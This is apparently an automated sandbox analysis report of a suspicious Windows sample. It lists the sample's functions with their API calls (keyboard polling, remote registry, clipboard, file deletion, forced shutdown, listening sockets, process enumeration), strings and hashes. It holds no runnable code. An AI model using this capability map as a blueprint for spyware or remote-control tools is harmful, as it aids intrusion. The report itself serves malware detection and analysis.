API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: e54aee7baf275ac5bd1c6202ebefc645e5e5e2006bc264af2c4bf8d9b106145a
Instruction ID: 556ecf40439a5af2ae377e3457a4e43071db74adcccc757bb8cc01e11c01760a
Opcode Fuzzy Hash: e54aee7baf275ac5bd1c6202ebefc645e5e5e2006bc264af2c4bf8d9b106145a
Instruction Fuzzy Hash: B331D4B150020AABDB20DFA0DC49FEB37BEEF89701F1041B6F608D6160EB7597448B65

Function 0063001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00630097
SetKeyboardState.USER32(?), ref: 00630102
GetAsyncKeyState.USER32(000000A0), ref: 00630122
GetKeyState.USER32(000000A0), ref: 00630139
GetAsyncKeyState.USER32(000000A1), ref: 00630168
GetKeyState.USER32(000000A1), ref: 00630179
GetAsyncKeyState.USER32(00000011), ref: 006301A5
GetKeyState.USER32(00000011), ref: 006301B3
GetAsyncKeyState.USER32(00000012), ref: 006301DC
GetKeyState.USER32(00000012), ref: 006301EA
GetAsyncKeyState.USER32(0000005B), ref: 00630213
GetKeyState.USER32(0000005B), ref: 00630221

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 6b2b337571b1f9cfeab7aaf8e2445baae28a0592bbf15929bdf7b071280bd7fa
Instruction ID: 0cc34bc4fe7ac6a2e2d9dfa416cdaf125c869e4e5c677e8c55cc53f89fd4f89d
Opcode Fuzzy Hash: 6b2b337571b1f9cfeab7aaf8e2445baae28a0592bbf15929bdf7b071280bd7fa
Instruction Fuzzy Hash: 5151DC3090478829FB35DBA488647EABFB69F11380F08459DD9C1576C2DA649B8CC7E5

Function 006503DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00650E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0064FDAD,?,?), ref: 00650E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006504AC

Part of subcall function 005D9837: __itow.LIBCMT ref: 005D9862
Part of subcall function 005D9837: __swprintf.LIBCMT ref: 005D98AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0065054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006505E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00650822
RegCloseKey.ADVAPI32(00000000), ref: 0065082F

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 754ea6927a3aeef3cd18dda450e06bb104ce1d57a5c42458b04cab15f72eab8c
Instruction ID: 1ea657ad60b66c463d1d848cc0f5b694ab1c735e7e9f0524ae2106c19b570f27
Opcode Fuzzy Hash: 754ea6927a3aeef3cd18dda450e06bb104ce1d57a5c42458b04cab15f72eab8c
Instruction Fuzzy Hash: 94E16B31604205AFDB14DF28C895E6ABBE5FF89714F04896DF84ADB3A1DB30E905CB91

Function 006483BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 005D9837: __itow.LIBCMT ref: 005D9862
Part of subcall function 005D9837: __swprintf.LIBCMT ref: 005D98AC

CoInitialize.OLE32 ref: 00648403
CoUninitialize.OLE32 ref: 0064840E
CoCreateInstance.OLE32(?,00000000,00000017,00662BEC,?), ref: 0064846E
IIDFromString.OLE32(?,?), ref: 006484E1
VariantInit.OLEAUT32(?), ref: 0064857B
VariantClear.OLEAUT32(?), ref: 006485DC

Strings

Invalid parameter, xrefs: 006484FA
NULL Pointer assignment, xrefs: 006484B3
Failed to create object, xrefs: 00648479, 0064852F

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 8eb6dccfef47dd5988fe03077b4056cf607e3b0162f00cb4d5280bd126da106b
Instruction ID: d129021219fdd8722bf206f173033bb53280b8eabdb25a31796c6301de06bca8
Opcode Fuzzy Hash: 8eb6dccfef47dd5988fe03077b4056cf607e3b0162f00cb4d5280bd126da106b
Instruction Fuzzy Hash: BD618B706083129FC754EF14C848FAEBBEAAF89754F04451AF9859B291CB70ED45CB92

Function 00644164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0064418B
EmptyClipboard.USER32 ref: 00644191
GlobalAlloc.KERNEL32(00000002,?), ref: 006441A6
CloseClipboard.USER32 ref: 00644245

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 5e0839da83313f2bd2d7dd58a7d3891cb4fff47bebfff8ca303139c357a00b62
Instruction ID: 8a2dca5b4f02855f9e6d73d56ecbdc61cb6338c58bad96cc54f17994ea0fc0df
Opcode Fuzzy Hash: 5e0839da83313f2bd2d7dd58a7d3891cb4fff47bebfff8ca303139c357a00b62
Instruction Fuzzy Hash: 372181752016119FDB11AF64EC0AB7E7BAAFF44751F10802AF946DB3A1DB70AD01CB94

Function 006337EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005D4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005D4743,?,?,005D37AE,?), ref: 005D4770

Part of subcall function 00634A31: GetFileAttributesW.KERNEL32(?,0063370B), ref: 00634A32

FindFirstFileW.KERNEL32(?,?), ref: 006338A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0063394B
MoveFileW.KERNEL32(?,?), ref: 0063395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0063397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 0063399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 006339B9

Strings

\*.*, xrefs: 0063384E, 00633857, 0063386C

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: bb7a5885a11dce9b766833c4d46dce1cbab0690bb9f7a8e052e0fd172fc56e54
Instruction ID: ad3216667b181d0bcc02d8ae8ec14e0f655abae6a47d59d986ee634aefe5eaa7
Opcode Fuzzy Hash: bb7a5885a11dce9b766833c4d46dce1cbab0690bb9f7a8e052e0fd172fc56e54
Instruction Fuzzy Hash: E551913180515D9ACF11EBA8C9969EDBB7AAF54301F6001AAF40277391FF316F09CBA0

Function 0063F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0063F440
Sleep.KERNEL32(0000000A), ref: 0063F470
_wcscmp.LIBCMT ref: 0063F484
_wcscmp.LIBCMT ref: 0063F49F
FindNextFileW.KERNEL32(?,?), ref: 0063F53D
FindClose.KERNEL32(00000000), ref: 0063F553

Strings

*.*, xrefs: 0063F425

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 996b14dc2b76f2b5da6c2e40802d3edb51a2237de8afd32d431fb8de44016873
Instruction ID: ae98870cf4d8a8166b0e2c99ed7ab7ca3136bcccb761e9170d75e8da891d78f0
Opcode Fuzzy Hash: 996b14dc2b76f2b5da6c2e40802d3edb51a2237de8afd32d431fb8de44016873
Instruction Fuzzy Hash: AF416C71D0021A9FCF10EF68CC59AEEBBB5FF54320F144466E815A32A1EB309E85CB90

Function 005E3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

3c^, xrefs: 005E3225
_^, xrefs: 005E3322

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3c^$_^
API String ID: 674341424-3555050690
Opcode ID: b3e33312c940d24467b348631981ecbb0d86a6d93284e6677c5b687c8615ee97
Instruction ID: 0d1b78f2a19bf10d57b8d6c97b3fb3d6c03c2564613650ed04b24baa679269b5
Opcode Fuzzy Hash: b3e33312c940d24467b348631981ecbb0d86a6d93284e6677c5b687c8615ee97
Instruction Fuzzy Hash: 36229C756083419FC728DF19C889BAEBBE5BF84710F04491EF59A97391EB30E944CB92

Function 005E5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005E58A5
_memmove.LIBCMT ref: 005E58F5
_memmove.LIBCMT ref: 005E595B

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 66c917e9f94644d44c108eeb11797eeeb926770da5ce9f6b80489c9d652cefe9
Instruction ID: ce4ca6c5a4e666724be4ee6a700f58099a2bf624213bf46f145cb05a27185f34
Opcode Fuzzy Hash: 66c917e9f94644d44c108eeb11797eeeb926770da5ce9f6b80489c9d652cefe9
Instruction Fuzzy Hash: 1712BE70A00A1ADFDF14DFA5D985AEEBBF6FF88304F10452AE446E7251EB35A910CB50

Function 006351BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 006287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0062882B
Part of subcall function 006287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00628858
Part of subcall function 006287E1: GetLastError.KERNEL32 ref: 00628865

ExitWindowsEx.USER32(?,00000000), ref: 006351F9

Strings

, xrefs: 006351E7
SeShutdownPrivilege, xrefs: 006351C9
@, xrefs: 006351EC

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 825c6b2d56398017d007f30c1593236a5ba54be2071015a160c29c0be55d893d
Instruction ID: 1068e30fb7bb4e5ca8ea6f017b7b71dfbf68464ed537f43b03ad0c40d2b719ae
Opcode Fuzzy Hash: 825c6b2d56398017d007f30c1593236a5ba54be2071015a160c29c0be55d893d
Instruction Fuzzy Hash: 380126317A1A116FF7686368AC9AFFB726AEB04341F240425F903E32D2DA515E0186E4

Function 00646283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006462DC
WSAGetLastError.WSOCK32(00000000), ref: 006462EB
bind.WSOCK32(00000000,?,00000010), ref: 00646307
listen.WSOCK32(00000000,00000005), ref: 00646316
WSAGetLastError.WSOCK32(00000000), ref: 00646330
closesocket.WSOCK32(00000000,00000000), ref: 00646344

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: b877e09f31f42e36a566512ff861491775172e1c111b43bbcf299bc8ce5deaae
Instruction ID: ee0e3af55d8ecb1b151dd62d54098bb54df9cda78e66467c868721aa6b255d27
Opcode Fuzzy Hash: b877e09f31f42e36a566512ff861491775172e1c111b43bbcf299bc8ce5deaae
Instruction Fuzzy Hash: AB21B1316002059FCB10EF68D849B6EBBBAEF89721F14415AF816E73D1CB70AD01CB51

Function 005E5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 005F0DB6: std::exception::exception.LIBCMT ref: 005F0DEC
Part of subcall function 005F0DB6: __CxxThrowException@8.LIBCMT ref: 005F0E01

_memmove.LIBCMT ref: 00620258
_memmove.LIBCMT ref: 0062036D
_memmove.LIBCMT ref: 00620414

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: d06f46abd0c8112d357e39ffc4caf4b77e09266339cb2f1c5b59169762d3d403
Instruction ID: 52ae5210dacecad7d36fdf1a15dea1d8d52badc15c39c0d93f509de4fb4a1dfc
Opcode Fuzzy Hash: d06f46abd0c8112d357e39ffc4caf4b77e09266339cb2f1c5b59169762d3d403
Instruction Fuzzy Hash: 2602C270A0061ADBDF04DF64D985ABE7BB6FF84300F14806AE946DB392EB34D950CB51

Function 005D1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 005D2612: GetWindowLongW.USER32(?,000000EB), ref: 005D2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 005D19FA
GetSysColor.USER32(0000000F), ref: 005D1A4E
SetBkColor.GDI32(?,00000000), ref: 005D1A61

Part of subcall function 005D1290: DefDlgProcW.USER32(?,00000020,?), ref: 005D12D8

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: bd05e492a313c4d8e7d2a45cca36aa70db80be0f15676ff595e28218d09768fd
Instruction ID: 21369febfc9b0ff54568b8b35dbfa2ba514c0e5876c0a41b5603cadd2a2f8cbe
Opcode Fuzzy Hash: bd05e492a313c4d8e7d2a45cca36aa70db80be0f15676ff595e28218d09768fd
Instruction Fuzzy Hash: 69A10360106D54BEEB38AB3D8C58DBB2E5EFB42342F14551BF502D63D6CA209D4193BE

Function 00646747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00647D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00647DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0064679E
WSAGetLastError.WSOCK32(00000000), ref: 006467C7
bind.WSOCK32(00000000,?,00000010), ref: 00646800
WSAGetLastError.WSOCK32(00000000), ref: 0064680D
closesocket.WSOCK32(00000000,00000000), ref: 00646821

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 97c046114a6e9bf00c17a204e095091e3006e2ee65c47702a441d220992c5b7f
Instruction ID: 1ba9d399adc4fdc0f27da791289d49f7542f06a80ebe7ed6c61e77bdcf89c721
Opcode Fuzzy Hash: 97c046114a6e9bf00c17a204e095091e3006e2ee65c47702a441d220992c5b7f
Instruction Fuzzy Hash: 2541E975A00211AFDB60BF68DC8AF7E7BA9EF45714F04845EF915AB3C2CA709D008791

Function 00655376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 006553C5
IsWindowEnabled.USER32 ref: 006553D3
GetForegroundWindow.USER32(?,?,00000001), ref: 006553E0
IsIconic.USER32 ref: 006553EE
IsZoomed.USER32 ref: 006553FC

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: c3eb02ba8b44bc19e8d12063935f970e681589bc3ddd9957e87af0c4dcdea69c
Instruction ID: 6daf0df3d73eb9c22e0a525d04d32c730b57345e676544a8e4656867ddcb54f2
Opcode Fuzzy Hash: c3eb02ba8b44bc19e8d12063935f970e681589bc3ddd9957e87af0c4dcdea69c
Instruction Fuzzy Hash: 3E11B631300A115BEB216F26DC5CA5E7B9BFF847A2F41402AFC4AD7351DB709D018694

Function 006280A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006280C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006280CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006280D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006280E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006280F6

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 8590680eee180d2fca1b4f9ee864830c30d3749da87ff999f21d5786fa177a41
Instruction ID: acfbf952d97f7ba9801fe6dfca63442b08922099fcc254917a839ef5456fd9a8
Opcode Fuzzy Hash: 8590680eee180d2fca1b4f9ee864830c30d3749da87ff999f21d5786fa177a41
Instruction Fuzzy Hash: BCF06231246715AFEB204FA5EC8DEAB3BAEEF49756F040025F945C7290CB619C61DE60

Function 005D4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,005D4AD0), ref: 005D4B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 005D4B57

Strings

GetNativeSystemInfo, xrefs: 005D4B51
kernel32.dll, xrefs: 005D4B40

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: e31a88849b303c93b67c2c3b556450b1b962cbcaa6c0577597117e841bfbbec6
Instruction ID: 831b9e93650806e49cad1c48b66fa4f386ae0f1986aa70d40dead66466598420
Opcode Fuzzy Hash: e31a88849b303c93b67c2c3b556450b1b962cbcaa6c0577597117e841bfbbec6
Instruction Fuzzy Hash: 66D01234A10713CFDB30DF35D918B0676D5AF15352F11883B98C5D6250E670D484CA54

Function 0064EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0064EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0064EE4B

Part of subcall function 005D7DE1: _memmove.LIBCMT ref: 005D7E22

Process32NextW.KERNEL32(00000000,?), ref: 0064EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0064EF1A

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

